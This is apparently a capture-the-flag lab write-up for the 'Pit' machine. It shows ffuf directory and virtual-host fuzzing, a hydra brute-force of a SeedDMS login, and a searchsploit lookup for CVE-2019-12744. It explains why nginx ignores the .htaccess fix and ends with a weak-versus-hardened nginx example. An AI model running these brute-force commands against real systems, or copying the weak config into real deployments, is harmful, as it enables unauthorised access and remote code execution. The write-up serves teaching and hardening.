Web


Nmap discovered a web server on the target's port 80. The running service is nginx 1.14.1.

Webroot


It’s the default Nginx installation page for RHEL Linux.

I get a 403 if I navigate to http://dms-pit.htb/ by name instead of by IP, so the dms-pit.htb virtual host is configured differently from the default server block.

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .php,.txt,.html 
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.241/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html              [Status: 200, Size: 4057, Words: 1711, Lines: 118, Duration: 97ms]
404.html                [Status: 200, Size: 3971, Words: 1723, Lines: 121, Duration: 92ms]
:: Progress: [882188/882188] :: Job [1/1] :: 424 req/sec :: Duration: [0:54:23] :: Errors: 0 ::

ffuf finds nothing beyond index.html and 404.html, both of which ship with the stock RHEL nginx package.

Sub-domain / Virtual Host Discovery


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.dms-pit.htb'  -fs 4057
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.241/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.dms-pit.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 4057
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 425 req/sec :: Duration: [0:05:59] :: Errors: 0 ::
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.pit.htb' -fs 4057
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.241/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.pit.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 4057
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 426 req/sec :: Duration: [0:06:34] :: Errors: 0 ::

No sub-domain or virtual host was found on port 80 for either dms-pit.htb or pit.htb; the -fs 4057 filter hides every response that is the same size as the default page.

SeedDMS


Earlier SNMP enumeration suggested that there is an instance of SeedDMS in the /var/www/html/seeddms51x/seeddms directory.

SeedDMS is a free and open-source document management system (DMS) that allows businesses to store, share, and track electronic documents. It provides features like full-text search, version control, access control, and audit trails, making it suitable for managing a wide range of documents. SeedDMS is written in PHP and can be easily customized and extended to meet specific business requirements.

Browsing to the suggested directory, I am redirected to a login page. I tried some default/weak credentials and none of them worked.

Then I realized that the earlier SNMP enumeration also gave me a valid system user, michelle.

Brute-force Attack


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ hydra -l michelle -P /usr/share/wordlists/rockyou.txt 'http-post-form://dms-pit.htb:80//seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=en_GB:F=Error signing in. User ID or password incorrect.'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 13:08:02
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking http-post-form://dms-pit.htb:80//seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=en_GB:F=Error signing in. User ID or password incorrect.
[80][http-post-form] host: dms-pit.htb   login: michelle   password: michelle
1 of 1 target successfully completed, 1 valid password found
hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 13:08:09

I was able to brute-force the password of the michelle user against the SeedDMS login page: the credential is michelle:michelle. Hydra's F= matcher counts any response that does not contain the failure string as a hit, so a reported password is worth confirming with a manual login.

Web GUI


Once signed in to the web application, I see a directory, /Docs/, and a note, /Upgrade Note. Both are owned by Administrator.

/Docs/


The /Docs/ directory has two sub-directories.

While both sub-directories are empty, I notice that there is another user, Jack

Upgrade Note


The note says that the platform was upgraded from version 5.1.10 to 5.1.15 because of a security issue.

┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ head CHANGELOG       
--------------------------------------------------------------------------------
                     Changes in version 5.1.15
--------------------------------------------------------------------------------
- Improved import from file system
- HTTP Proxy for access on external extension repository can be set
- Do not use unzip in ExtensionMgr anymore
- fix version compare on info page
- allow one page mode on search page
- fix import of older extension versions from repository

The attached CHANGELOG confirms the version: its first entry is 5.1.15.

Vulnerability


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ searchsploit SeedDMS 5.1
------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)   | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                  | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting        | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting          | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution              | php/webapps/47022.txt
------------------------------------------------------------------ ---------------------------------
shellcodes: No Results
papers: No Results

The output lists an RCE exploit against SeedDMS versions < 5.1.11. The upgrade from 5.1.10 mentioned in the note must have been in response to that issue.

CVE-2019-12744


┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ searchsploit -x php/webapps/47022.txt
  Exploit: SeedDMS versions < 5.1.11 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/47022
     Path: /usr/share/exploitdb/exploits/php/webapps/47022.txt
    Codes: CVE-2019-12744
 Verified: False
File Type: ASCII text

The exploit targets CVE-2019-12744.

Checking the CHANGELOG for CVE-2019-12744 shows that version 5.1.11 mitigated it by adding a .htaccess file to the /data/ directory.

.htaccess

┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ curl -s 'http://dms-pit.htb/seeddms51x/data/.htaccess'
# line below if for Apache 2.4
<ifModule mod_authz_core.c>
Require all denied
</ifModule>
 
# line below if for Apache 2.2
<ifModule !mod_authz_core.c>
deny from all
Satisfy All
</ifModule>
 
# section for Apache 2.2 and 2.4
<ifModule mod_autoindex.c>
IndexIgnore *
</ifModule>

The .htaccess file is indeed present in the /data/ directory. But .htaccess is an Apache-specific mechanism for per-directory configuration: the directives above only take effect when Apache (with AllowOverride enabled) is the server handing out that directory.

This application is served by Nginx, not Apache, and Nginx ignores .htaccess files entirely. The request above already proves it: if the deny rule were in force, the server would have answered 403 instead of returning the file's contents.

So the 5.1.11 mitigation does not apply here, and the target web application may still be subject to CVE-2019-12744 and the RCE exploit above.
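For comparison, here is what the same protection looks like when it is applied in the web server that actually runs, as an added example that is neither the target's configuration nor part of the SeedDMS project. It assumes the web root is /var/www/html (so that /seeddms51x/data/ maps to the data directory named in the SNMP output) and that PHP is handled by php-fpm on a local socket; both are assumptions. The first server block is the situation observed above, where everything under the root is served; the second denies the data tree before any PHP handler can see it. Only one of the two blocks would be active in a real deployment.

```nginx
# Added example, not the target's real config. Assumes root /var/www/html
# and php-fpm listening on /run/php-fpm/www.sock.

# WEAK: everything under the root is served, including /seeddms51x/data/.
# Nginx never reads the .htaccess that SeedDMS 5.1.11+ drops in that
# directory, so uploaded files (PHP included) are reachable and executable.
server {
    listen 80;
    server_name dms-pit.htb;
    root /var/www/html;
    index index.php index.html;

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php-fpm/www.sock;
    }
}

# HARDENED: the data tree is never served by the web server. SeedDMS hands
# documents to users through its own PHP front end, so nothing legitimate
# needs direct access to /seeddms51x/data/.
server {
    listen 80;
    server_name dms-pit.htb;
    root /var/www/html;
    index index.php index.html;

    # "^~" makes this prefix match final: Nginx stops here and does not go on
    # to evaluate the regex locations below, so a .php file under data/ can
    # never reach php-fpm. This also hides dotfiles such as .htaccess.
    location ^~ /seeddms51x/data/ {
        deny all;
    }

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php-fpm/www.sock;
    }
}
```

After reloading Nginx with the hardened block, the same curl against /seeddms51x/data/.htaccess should return a 403 rather than the file body; that response, not the mere presence of the .htaccess file, is the check that the mitigation is in force.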